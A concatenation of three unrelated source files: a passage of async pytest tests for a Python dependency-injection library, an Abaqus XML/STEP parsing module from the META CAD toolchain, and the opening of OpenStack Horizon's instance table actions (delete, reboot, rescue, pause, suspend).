        assert candidate.resource1 is RESOURCE1
        assert candidate.resource2 is RESOURCE2

    _verify_client(await container.client())
    _verify_client(await container.client())

    first = await container.service()
    second = await container.service()
    for built in (first, second):
        assert isinstance(built, Service)
        _verify_client(built.client)
    assert first.client is not second.client
@mark.asyncio
async def test_context_kwargs_injection():
    """Call-time keyword arguments override the declared injections."""
    resource2_extra = object()
    container = Container()

    # Two independent calls must both honor the override.
    for _ in range(2):
        built = await container.client(resource2=resource2_extra)
        assert isinstance(built, Client)
        assert built.resource1 is RESOURCE1
        assert built.resource2 is resource2_extra
@mark.asyncio
async def test_args_kwargs_injection():
    """Mixed positional and keyword injections of async resources work."""
    class ContainerWithArgsAndKwArgs(BaseContainer):
        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            resource2=BaseContainer.resource2,
        )
        service = providers.Factory(
            Service,
            client=client,
        )

    container = ContainerWithArgsAndKwArgs()

    def _verify_client(candidate):
        assert isinstance(candidate, Client)
        assert candidate.resource1 is RESOURCE1
        assert candidate.resource2 is RESOURCE2

    _verify_client(await container.client())
    _verify_client(await container.client())

    first = await container.service()
    second = await container.service()
    for built in (first, second):
        assert isinstance(built, Service)
        _verify_client(built.client)
    assert first.client is not second.client
@mark.asyncio
async def test_async_provider_with_async_injections():
    """An async factory can receive the awaited result of another async factory.

    See: https://github.com/ets-labs/python-dependency-injector/issues/368
    """
    async def async_client_provider():
        return {"client": "OK"}

    async def async_service(client):
        return {"service": "OK", "client": client}

    class Container(containers.DeclarativeContainer):
        client = providers.Factory(async_client_provider)
        service = providers.Factory(async_service, client=client)

    result = await Container().service()
    assert result == {"service": "OK", "client": {"client": "OK"}}
@mark.asyncio
async def test_with_awaitable_injection():
    """Resource instances are injected as objects, never awaited directly."""
    class SomeResource:
        def __await__(self):
            raise RuntimeError("Should never happen")

    async def init_resource():
        yield SomeResource()

    class Service:
        def __init__(self, resource) -> None:
            self.resource = resource

    class Container(containers.DeclarativeContainer):
        resource = providers.Resource(init_resource)
        service = providers.Factory(Service, resource=resource)

    container = Container()

    # Both providers run asynchronously and hand back futures when called.
    assert isinstance(container.service(), asyncio.Future)
    assert isinstance(container.resource(), asyncio.Future)

    built_resource = await container.resource()
    built_service = await container.service()
    assert isinstance(built_resource, SomeResource)
    assert isinstance(built_service.resource, SomeResource)
    assert built_service.resource is built_resource
@mark.asyncio
async def test_with_awaitable_injection_and_with_init_resources_call():
    """Same as the plain awaitable-injection test, after init_resources()."""
    class SomeResource:
        def __await__(self):
            raise RuntimeError("Should never happen")

    async def init_resource():
        yield SomeResource()

    class Service:
        def __init__(self, resource) -> None:
            self.resource = resource

    class Container(containers.DeclarativeContainer):
        resource = providers.Resource(init_resource)
        service = providers.Factory(Service, resource=resource)

    container = Container()
    await container.init_resources()

    # Even pre-initialized, calls still come back as futures.
    assert isinstance(container.service(), asyncio.Future)
    assert isinstance(container.resource(), asyncio.Future)

    built_resource = await container.resource()
    built_service = await container.service()
    assert isinstance(built_resource, SomeResource)
    assert isinstance(built_service.resource, SomeResource)
    assert built_service.resource is built_resource
@mark.asyncio
async def test_injection_error():
    """An exception raised while initializing a resource reaches the caller."""
    async def init_resource():
        raise Exception("Something went wrong")

    class Container(containers.DeclarativeContainer):
        resource_with_error = providers.Resource(init_resource)

        client = providers.Factory(
            Client,
            resource1=resource_with_error,
            resource2=None,
        )

    with raises(Exception, match="Something went wrong"):
        await Container().client()
@mark.asyncio
async def test_injection_runtime_error_async_provides():
    """An exception raised inside an async provides-callable propagates."""
    async def create_client(*args, **kwargs):
        raise Exception("Something went wrong")

    class Container(BaseContainer):
        client = providers.Factory(
            create_client,
            resource1=BaseContainer.resource1,
            resource2=None,
        )

    with raises(Exception, match="Something went wrong"):
        await Container().client()
@mark.asyncio
async def test_injection_call_error_async_provides():
    """Calling an async provides-callable with unknown kwargs raises TypeError."""
    async def create_client():  # <-- no args defined
        ...

    class Container(BaseContainer):
        client = providers.Factory(
            create_client,
            resource1=BaseContainer.resource1,
            resource2=None,
        )

    with raises(TypeError) as exception_info:
        await Container().client()

    message = str(exception_info.value)
    assert "create_client() got" in message
    assert "unexpected keyword argument" in message
@mark.asyncio
async def test_attributes_injection():
    """Attribute injections resolve async providers before assignment."""
    class ContainerWithAttributes(BaseContainer):
        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            resource2=None,
        )
        client.add_attributes(resource2=BaseContainer.resource2)

        service = providers.Factory(
            Service,
            client=None,
        )
        service.add_attributes(client=client)

    container = ContainerWithAttributes()

    def _verify_client(candidate):
        assert isinstance(candidate, Client)
        assert candidate.resource1 is RESOURCE1
        assert candidate.resource2 is RESOURCE2

    _verify_client(await container.client())
    _verify_client(await container.client())

    first = await container.service()
    second = await container.service()
    for built in (first, second):
        assert isinstance(built, Service)
        _verify_client(built.client)
    assert first.client is not second.client
@mark.asyncio
async def test_attributes_injection_attribute_error():
    """An exception raised by an attribute setter propagates to the caller."""
    class ClientWithException(Client):
        @property
        def attribute_set_error(self):
            return None

        @attribute_set_error.setter
        def attribute_set_error(self, value):
            raise Exception("Something went wrong")

    class Container(BaseContainer):
        client = providers.Factory(
            ClientWithException,
            resource1=BaseContainer.resource1,
            resource2=BaseContainer.resource2,
        )
        client.add_attributes(attribute_set_error=123)

    with raises(Exception, match="Something went wrong"):
        await Container().client()
@mark.asyncio
async def test_attributes_injection_runtime_error():
    """A failing resource used for attribute injection propagates its error."""
    async def init_resource():
        raise Exception("Something went wrong")

    class Container(containers.DeclarativeContainer):
        resource = providers.Resource(init_resource)

        client = providers.Factory(
            Client,
            resource1=None,
            resource2=None,
        )
        client.add_attributes(resource1=resource)
        client.add_attributes(resource2=resource)

    with raises(Exception, match="Something went wrong"):
        await Container().client()
@mark.asyncio
async def test_async_instance_and_sync_attributes_injection():
    """Async-built instances accept synchronous Object attribute injections."""
    class ContainerWithAttributes(BaseContainer):
        resource1 = providers.Resource(init_resource, providers.Object(RESOURCE1))

        client = providers.Factory(
            Client,
            BaseContainer.resource1,
            resource2=None,
        )
        client.add_attributes(resource2=providers.Object(RESOURCE2))

        service = providers.Factory(
            Service,
            client=None,
        )
        service.add_attributes(client=client)

    container = ContainerWithAttributes()

    def _verify_client(candidate):
        assert isinstance(candidate, Client)
        assert candidate.resource1 is RESOURCE1
        assert candidate.resource2 is RESOURCE2

    _verify_client(await container.client())
    _verify_client(await container.client())

    first = await container.service()
    second = await container.service()
    for built in (first, second):
        assert isinstance(built, Service)
        _verify_client(built.client)
    assert first.client is not second.client
| |
# Copyright (C) 2013-2015 MetaMorph Software, Inc
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this data, including any software or models in source or binary
# form, as well as any drawings, specifications, and documentation
# (collectively "the Data"), to deal in the Data without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Data, and to
# permit persons to whom the Data is furnished to do so, subject to the
# following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Data.
# THE DATA IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS, SPONSORS, DEVELOPERS, CONTRIBUTORS, OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE DATA OR THE USE OR OTHER DEALINGS IN THE DATA.
# =======================
# This version of the META tools is a fork of an original version produced
# by Vanderbilt University's Institute for Software Integrated Systems (ISIS).
# Their license statement:
# Copyright (C) 2011-2014 Vanderbilt University
# Developed with the sponsorship of the Defense Advanced Research Projects
# Agency (DARPA) and delivered to the U.S. Government with Unlimited Rights
# as defined in DFARS 252.227-7013.
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this data, including any software or models in source or binary
# form, as well as any drawings, specifications, and documentation
# (collectively "the Data"), to deal in the Data without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Data, and to
# permit persons to whom the Data is furnished to do so, subject to the
# following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Data.
# THE DATA IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS, SPONSORS, DEVELOPERS, CONTRIBUTORS, OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE DATA OR THE USE OR OTHER DEALINGS IN THE DATA.
"""
AbaqusParse.py, version 1.4.0
For use with Abaqus 6.13-1 (Python 2.6.2).
Created by Ozgur Yapar <oyapar@isis.vanderbilt.edu>
Robert Boyles <rboyles@isis.vanderbilt.edu>
- Includes modules which parse the XML files generated by CyPhy
and Create Assembly program to get the essential data which
contains user inputs and CAD data.
"""
from abaqus import *
from abaqusConstants import *
import os, re
from numpy import array, cross, transpose, vstack, dot
import numpy.linalg as LA
import string as STR
import xml.etree.ElementTree as ET
import _winreg, sys, ctypes, uuid, traceback
import logging
def parseMaterialLibrary():
    """Locate and load the META material library.

    Reads META_PATH from the Windows registry (32-bit view), makes the
    bundled MaterialLibraryInterface package importable, resolves the
    user's Documents folder via the Win32 shell API, and returns a
    LibraryManager bound to material_library.json.
    """
    # META_PATH is stored under HKLM\Software\META (32-bit registry view).
    with _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, r'Software\META', 0, _winreg.KEY_READ | _winreg.KEY_WOW64_32KEY) as key:
        META_PATH = _winreg.QueryValueEx(key, 'META_PATH')[0]
    # Make the META-bundled site-packages importable before the import below.
    MATERIALLIBINTERFACEPATH = os.path.join(META_PATH, "bin", "Python27", "Lib", "site-packages")
    sys.path.insert(0, MATERIALLIBINTERFACEPATH)
    from MaterialLibraryInterface import LibraryManager
    # Resolve the user's Documents folder through SHGetKnownFolderPath;
    # PATH is the out-parameter buffer, the GUID is FOLDERID_Documents.
    PATH = ctypes.c_wchar_p(chr(0x00) * 256)
    FOLDERID_DOCUMENTS = ctypes.c_char_p(uuid.UUID("ED4824AF-DCE4-45A8-81E2-FC7965083634").bytes_le)
    ctypes.windll.shell32.SHGetKnownFolderPath(FOLDERID_DOCUMENTS, 0, None, ctypes.byref(PATH))
    MATERIALLIBPATH = os.path.join(PATH.value, "META Documents", "MaterialLibrary", "material_library.json")
    return LibraryManager(MATERIALLIBPATH)
def parseCADAssemblyXML(args):
    """Parse CADAssembly.xml (CyPhy output) and extract the FEA configuration.

    Parameters:
        args -- parsed command-line arguments; only args.meshOnly is read.

    Returns a tuple:
        (xmlName, feaXML, cadAssemblyXML, metricSetXML, metricsSetXML,
         metricsComponentSetXML, maxNumberIter, analysisConstraintSetXML,
         thermalSetXML)

    Raises on parse failure or any missing required XML block; every
    failure is logged (with traceback) before re-raising.
    """
    logger = logging.getLogger()
    logger.info("XML parser is obtaining necessary data from CyPhy assembly XML \n")  # XML parser obtains necessary data from CyPhy
    xmlName = 'CADAssembly.XML'
    xmlPath = os.path.join(os.getcwd(), xmlName)
    try:
        tree = ET.parse(xmlPath)
        xmlRoot = tree.getroot()
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot parse CADAssembly.xml.\n')
        raise
    # NOTE(review): Element.find() returns None instead of raising when a
    # block is absent, so most of these try/excepts can only fire via a later
    # AttributeError -- confirm the intended failure mode.
    try:
        assemblyXML = xmlRoot.find('Assembly')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"Assembly/" in CADAssembly.xml.\n')
        raise
    try:
        analysesXML = assemblyXML.find('Analyses')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"Analyses/" in CADAssembly.xml.\n')
        raise
    try:
        cadAssemblyXML = assemblyXML.find('CADComponent')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"CADComponent/" in CADAssembly.xml.\n')
        raise
    try:
        feaXML = analysesXML.find('FEA')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"FEA/" in CADAssembly.xml.\n')
        raise
    try:
        # getiterator() is the legacy (pre-ElementTree-1.3) spelling of iter().
        metricSetXML = feaXML.getiterator('Metric')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find \"Metric\" inside the block FEA in CADAssembly.xml.\n')
        raise
    # Determine if a thermal analysis is to be included.
    thermalSetXML = feaXML.find('ThermalElements')
    try:
        metricsSetXML = feaXML.find('Metrics')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find \"Metrics\" inside the block \"FEA\" in CADAssembly.xml.\n')
        raise
    try:
        metricsComponentSetXML = metricsSetXML.findall('Metric')
    except:
        # Missing Metrics block: fall back to the sentinel string 'null'.
        metricsComponentSetXML = 'null'
        pass
    try:
        # Clamp the adaptive-iteration count to the inclusive range [1, 10].
        maxNumberIter = int(feaXML.get("MaxAdaptiveIterations"))
        if maxNumberIter > 10:
            maxNumberIter = 10
            logger.info('MaxIterations greater than maximum of 10. Setting MaxIterations to 10. \n')
        elif maxNumberIter <= 0:
            maxNumberIter = 1
            # NOTE(review): the message says "minimum of 0" but the enforced
            # minimum is 1 -- confirm the intended wording.
            logger.info('MaxIterations less than minimum of 0. Setting MaxIterations to 1. \n')
    except Exception as e:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Error in reading maximum number of iterations from CADAssembly.xml file.\n')
        raise
    analysisConstraintSetXML = None
    if not args.meshOnly:
        try:
            analysisConstraintsXML = feaXML.find('AnalysisConstraints')
            # If None, could be a thermal only analysis
            if analysisConstraintsXML is not None:
                analysisConstraintSetXML = analysisConstraintsXML.getiterator('AnalysisConstraint')
        except:
            logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
            logger.error('The model has not been constrained properly. This may cause rigid body motion during regular FEA analysis.\n')
            raise
    logger.info('Successfully parsed all required data from CADAssembly.XML \n')
    logger.info("**********************************************************************************" + '\n')
    return (xmlName, feaXML, cadAssemblyXML, metricSetXML, metricsSetXML,
            metricsComponentSetXML, maxNumberIter, analysisConstraintSetXML,
            thermalSetXML)
def parseStep(cadAssemblyXML):
    """Resolve and open the assembly STEP file referenced by CADAssembly.xml.

    Parameters:
        cadAssemblyXML -- the top-level <CADComponent> element.

    Returns:
        (stepPath, testBenchName, step) where *step* is the object
        returned by mdb.openStep().

    Raises:
        Any failure locating or opening the file (logged first); a
        ValueError if the component is not an assembly.
    """
    logger = logging.getLogger()
    logger.info("Defining the path for the STEP file" + '\n')
    try:
        # BUG FIX: previously a component whose Type was not "ASSEMBLY" fell
        # through silently and crashed below with an unbound-name NameError
        # on 'stepName'; fail fast with an explicit, logged error instead.
        if cadAssemblyXML.get("Type") != "ASSEMBLY":
            raise ValueError('Top-level CADComponent is not of Type "ASSEMBLY"; cannot locate the STEP file')
        testBenchName = cadAssemblyXML.get("Name")
        stepName = testBenchName + '_asm.stp'
        stepPath = os.path.join(os.getcwd(), 'AP203_E2_SINGLE_FILE', stepName)
        step = mdb.openStep(fileName=stepPath)
    except Exception as e:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Error during finding and opening the step file\n')
        raise
    logger.info("Opening the STEP file " + str(stepName) + ' and converting it into raw data' + '\n')
    logger.info("**********************************************************************************" + '\n')
    return (stepPath, testBenchName, step)
def parseCADAssemblyMetricsXML(runAdams):
    """Parse CADAssembly_metrics.xml produced by the Create Assembly program.

    Parameters:
        runAdams -- truthy for ADAMS runs; then the <Joints> block is
                    mandatory and its absence is a fatal error.

    Returns a tuple:
        (xmlMetricsName, metricComponentsXML, metricComponentXML,
         metricAssembliesXML, metricAssemblyXML, metricCADComponentsXML,
         jointsXML)  -- jointsXML is None when absent on non-ADAMS runs.
    """
    logger = logging.getLogger()
    logger.info("XML parser is obtaining necessary data from Create Assemby program" + '\n')
    xmlMetricsName = 'CADAssembly_metrics.xml'
    xmlMetricsPath = os.path.join(os.getcwd(), xmlMetricsName)
    try:
        treeMetrics = ET.parse(xmlMetricsPath)
        xmlMetricsRoot = treeMetrics.getroot()
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot parse CADAssembly_metrics.xml.\n')
        raise
    # NOTE(review): Element.find() returns None instead of raising when a
    # block is absent, so the try/excepts below can only fire via a later
    # AttributeError -- confirm the intended failure mode.
    try:
        metricComponentsXML = xmlMetricsRoot.find('MetricComponents')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"MetricComponents/" in CADAssembly_metrics.xml.\n')
        raise
    try:
        metricComponentXML = metricComponentsXML.findall('MetricComponent')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"MetricComponent/" in CADAssembly_metrics.xml.\n')
        raise
    try:
        metricAssembliesXML = xmlMetricsRoot.find('Assemblies')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"Assemblies/" in CADAssembly_metrics.xml.\n')
        raise
    try:
        metricAssemblyXML = metricAssembliesXML.find('Assembly')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"Assembly/" in CADAssembly_metrics.xml.\n')
        raise
    try:
        metricCADComponentsXML = metricAssemblyXML.find('CADComponent')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find the block /"CADComponent/" in CADAssembly_metrics.xml.\n')
        raise
    try:
        jointsXML = xmlMetricsRoot.find('Joints')
    except:
        if runAdams:  # required for ADAMS runs, not necessarily for standalone
            logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
            logger.error('Cannot find the block /"Joints/" in CADAssembly_metrics.xml.\n')
            raise
        else:
            jointsXML = None
    logger.info('Successfully parsed all required data from CADAssemblyMetrics.XML \n')
    logger.info("**********************************************************************************" + '\n')
    return (xmlMetricsName, metricComponentsXML, metricComponentXML,
            metricAssembliesXML, metricAssemblyXML, metricCADComponentsXML, jointsXML)
def parseKinComputedValuesXML():
    """Parse kinComputedValues.xml (Adams output) for the anchored component.

    Returns:
        (anchorID, anchorPoint) -- the ComponentInstanceID and ArrayValue
        of the component whose Metric has MetricID 'Anchor'.
    """
    logger = logging.getLogger()
    logger.info("XML parser is obtaining necessary data from Adams" + '\n')
    xmlCompName = 'kinComputedValues.xml'
    xmlCompPath = os.path.join(os.getcwd(), xmlCompName)
    try:
        treeComp = ET.parse(xmlCompPath)
        xmlCompRoot = treeComp.getroot()
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot parse ComputedValues.xml.\n')
        raise
    try:
        ComputedComponentXML = xmlCompRoot.findall('Component')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find \"Components\" block inside the ComputedValues.xml file.\n')
        raise
    try:
        for element in ComputedComponentXML:
            compMetrics = element.find('Metrics')
            compMetric = compMetrics.find('Metric')
            try:
                # compMetric is None when this component has no <Metric>;
                # .get() then raises AttributeError and the component is skipped.
                compMetricID = compMetric.get('MetricID')
            except AttributeError:
                continue
            if compMetricID == 'Anchor':
                anchorID = element.get('ComponentInstanceID')
                anchorPoint = compMetric.get('ArrayValue')
    except:
        logger.error(STR.join(traceback.format_exception(*sys.exc_info())))
        logger.error('Cannot find anchored part name inside the ComputedValues.xml file.\n')
        raise
    # NOTE(review): if no component carries MetricID 'Anchor', anchorID and
    # anchorPoint are never bound and the return below raises NameError --
    # confirm whether that can happen in practice.
    logger.info('Successfully parsed all required data from kinComputedValues.XML \n')
    logger.info("**********************************************************************************" + '\n')
    return (anchorID, anchorPoint)
def parseInpTemp(inpTempFile):  # Determine up to which point the temporary INP file needs to be merged...
    # ...with the final INP file
    """Find where the temporary INP file stops being merged into the final INP.

    Scans *inpTempFile* (an iterable of lines) for lines whose second
    whitespace-separated token is 'STEP:' and returns the 1-based number
    of the line preceding the LAST such line.

    Raises:
        ValueError -- if no 'STEP:' marker line is present (previously
        this surfaced as an unhelpful unbound-variable NameError).
    """
    stopLine = None
    for lineNumber, eachLine in enumerate(inpTempFile, start=1):
        words = eachLine.split()
        # Marker lines look like "* STEP: ..."; only the second token
        # matters.  Short lines simply do not match (no bare except needed).
        if len(words) > 1 and words[1] == 'STEP:':
            stopLine = lineNumber - 1
    if stopLine is None:
        raise ValueError("No 'STEP:' marker line found in temporary INP file")
    return stopLine
def parseLOD(lodFile):  # Determine from which point the LOD file generated by Adams needs...
    # ...to be merged with the final INP file
    """Find where the Adams-generated LOD file starts merging into the final INP.

    Scans *lodFile* (an iterable of lines) for the FIRST line whose third
    whitespace-separated token is 'CASE' and returns its 1-based line number.

    Raises:
        ValueError -- if no 'CASE' marker line is present (previously this
        surfaced as an unhelpful unbound-variable NameError).
    """
    for lineNumber, eachLine in enumerate(lodFile, start=1):
        words = eachLine.split()
        # Short lines simply do not match (no bare except needed).
        if len(words) > 2 and words[2] == 'CASE':
            return lineNumber
    raise ValueError("No 'CASE' marker line found in LOD file")
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.http import HttpResponse
from django import template
from django.template.defaultfilters import title
from django import urls
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import npgettext_lazy
from django.utils.translation import pgettext_lazy
from django.utils.translation import string_concat
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
import netaddr
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.floating_ips import workflows
from openstack_dashboard.dashboards.project.instances import tabs
from openstack_dashboard.dashboards.project.instances.workflows \
import resize_instance
from openstack_dashboard.dashboards.project.instances.workflows \
import update_instance
from openstack_dashboard import policy
from openstack_dashboard.views import get_url_with_pagination
LOG = logging.getLogger(__name__)
# Instance statuses in which most "active" operations (console, log,
# reboot, snapshot prerequisites, ...) are permitted.
ACTIVE_STATES = ("ACTIVE",)
VOLUME_ATTACH_READY_STATES = ("ACTIVE", "SHUTOFF")
SNAPSHOT_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")
SHELVE_READY_STATES = ("ACTIVE", "SHUTOFF", "PAUSED", "SUSPENDED")
# Mapping of nova's numeric power-state codes to their symbolic names
# (used by get_power_state below).
POWER_STATES = {
    0: "NO STATE",
    1: "RUNNING",
    2: "BLOCKED",
    3: "PAUSED",
    4: "SHUTDOWN",
    5: "SHUTOFF",
    6: "CRASHED",
    7: "SUSPENDED",
    8: "FAILED",
    9: "BUILDING",
}
# Indexes into the (forward, reverse) label tuples returned by the
# Toggle* actions' action_present()/action_past() methods.
PAUSE = 0
UNPAUSE = 1
SUSPEND = 0
RESUME = 1
SHELVE = 0
UNSHELVE = 1
def is_deleting(instance):
    """Return True if the instance's nova task state is "deleting"."""
    state = getattr(instance, "OS-EXT-STS:task_state", None)
    return bool(state) and state.lower() == "deleting"
class DeleteInstance(policy.PolicyTargetMixin, tables.DeleteAction):
    """Table action that schedules deletion of the selected instance(s)."""
    policy_rules = (("compute", "os_compute_api:servers:delete"),)
    help_text = _("Deleted instances are not recoverable.")
    default_message_level = "info"
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Delete Instance",
            u"Delete Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Scheduled deletion of Instance",
            u"Scheduled deletion of Instances",
            count
        )
    def allowed(self, request, instance=None):
        # Deletion is always offered for ERROR'd instances, even while a
        # (possibly stuck) "deleting" task state is set.
        error_state = False
        if instance:
            error_state = (instance.status == 'ERROR')
        return error_state or not is_deleting(instance)
    def action(self, request, obj_id):
        api.nova.server_delete(request, obj_id)
class RebootInstance(policy.PolicyTargetMixin, tables.BatchAction):
    """Hard-reboot the selected instance(s) (power cycle, data loss risk)."""
    name = "reboot"
    classes = ('btn-reboot',)
    policy_rules = (("compute", "os_compute_api:servers:reboot"),)
    help_text = _("Restarted instances will lose any data"
                  " not saved in persistent storage.")
    action_type = "danger"
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Hard Reboot Instance",
            u"Hard Reboot Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Hard Rebooted Instance",
            u"Hard Rebooted Instances",
            count
        )
    def allowed(self, request, instance=None):
        # Hard reboot works on both running and shut-off instances.
        if instance is not None:
            return ((instance.status in ACTIVE_STATES or
                     instance.status == 'SHUTOFF') and
                    not is_deleting(instance))
        else:
            return True
    def action(self, request, obj_id):
        api.nova.server_reboot(request, obj_id, soft_reboot=False)
class SoftRebootInstance(RebootInstance):
    """Soft-reboot (graceful OS restart) of the selected instance(s)."""
    name = "soft_reboot"
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Soft Reboot Instance",
            u"Soft Reboot Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Soft Rebooted Instance",
            u"Soft Rebooted Instances",
            count
        )
    def action(self, request, obj_id):
        api.nova.server_reboot(request, obj_id, soft_reboot=True)
    def allowed(self, request, instance=None):
        # Unlike a hard reboot, a soft reboot needs a running guest OS,
        # so SHUTOFF instances are excluded here.
        if instance is not None:
            return instance.status in ACTIVE_STATES
        else:
            return True
class RescueInstance(policy.PolicyTargetMixin, tables.LinkAction):
    """Open the modal that puts an active instance into rescue mode."""
    name = "rescue"
    verbose_name = _("Rescue Instance")
    classes = ("btn-rescue", "ajax-modal")
    url = "horizon:project:instances:rescue"
    def get_link_url(self, datum):
        instance_id = self.table.get_object_id(datum)
        return urls.reverse(self.url, args=[instance_id])
    def allowed(self, request, instance):
        return instance.status in ACTIVE_STATES
class UnRescueInstance(tables.BatchAction):
    """Take an instance out of RESCUE mode."""
    name = 'unrescue'
    classes = ("btn-unrescue",)
    @staticmethod
    def action_present(count):
        return ungettext_lazy(
            u"Unrescue Instance",
            u"Unrescue Instances",
            count
        )
    @staticmethod
    def action_past(count):
        return ungettext_lazy(
            u"Unrescued Instance",
            u"Unrescued Instances",
            count
        )
    def action(self, request, obj_id):
        api.nova.server_unrescue(request, obj_id)
    def allowed(self, request, instance=None):
        # Only meaningful for instances currently in rescue mode.
        if instance:
            return instance.status == "RESCUE"
        return False
class TogglePause(tables.BatchAction):
    """Pause a running instance or unpause a paused one.

    allowed() caches the current paused state on ``self`` and selects the
    matching (present, past) label via current_present_action /
    current_past_action, which the BatchAction machinery reads.
    """
    name = "pause"
    icon = "pause"
    @staticmethod
    def action_present(count):
        # (pause label, resume label) — indexed by PAUSE / UNPAUSE.
        return (
            ungettext_lazy(
                u"Pause Instance",
                u"Pause Instances",
                count
            ),
            ungettext_lazy(
                u"Resume Instance",
                u"Resume Instances",
                count
            ),
        )
    @staticmethod
    def action_past(count):
        return (
            ungettext_lazy(
                u"Paused Instance",
                u"Paused Instances",
                count
            ),
            ungettext_lazy(
                u"Resumed Instance",
                u"Resumed Instances",
                count
            ),
        )
    def allowed(self, request, instance=None):
        if not api.nova.extension_supported('AdminActions',
                                            request):
            return False
        if not instance:
            return False
        # Cached for action() to decide between pause and unpause.
        self.paused = instance.status == "PAUSED"
        if self.paused:
            self.current_present_action = UNPAUSE
            policy_rules = (
                ("compute", "os_compute_api:os-pause-server:unpause"),)
        else:
            self.current_present_action = PAUSE
            policy_rules = (
                ("compute", "os_compute_api:os-pause-server:pause"),)
        has_permission = policy.check(
            policy_rules, request,
            target={'project_id': getattr(instance, 'tenant_id', None)})
        return (has_permission and
                (instance.status in ACTIVE_STATES or self.paused) and
                not is_deleting(instance))
    def action(self, request, obj_id):
        if self.paused:
            api.nova.server_unpause(request, obj_id)
            self.current_past_action = UNPAUSE
        else:
            api.nova.server_pause(request, obj_id)
            self.current_past_action = PAUSE
class ToggleSuspend(tables.BatchAction):
    """Suspend a running instance or resume a suspended one.

    allowed() caches the current suspended state on ``self`` and selects
    the matching (present, past) label via current_present_action /
    current_past_action, which the BatchAction machinery reads.
    """
    name = "suspend"
    classes = ("btn-suspend",)
    @staticmethod
    def action_present(count):
        # (suspend label, resume label) — indexed by SUSPEND / RESUME.
        return (
            ungettext_lazy(
                u"Suspend Instance",
                u"Suspend Instances",
                count
            ),
            ungettext_lazy(
                u"Resume Instance",
                u"Resume Instances",
                count
            ),
        )
    @staticmethod
    def action_past(count):
        return (
            ungettext_lazy(
                u"Suspended Instance",
                u"Suspended Instances",
                count
            ),
            ungettext_lazy(
                u"Resumed Instance",
                u"Resumed Instances",
                count
            ),
        )
    def allowed(self, request, instance=None):
        if not api.nova.extension_supported('AdminActions',
                                            request):
            return False
        if not instance:
            return False
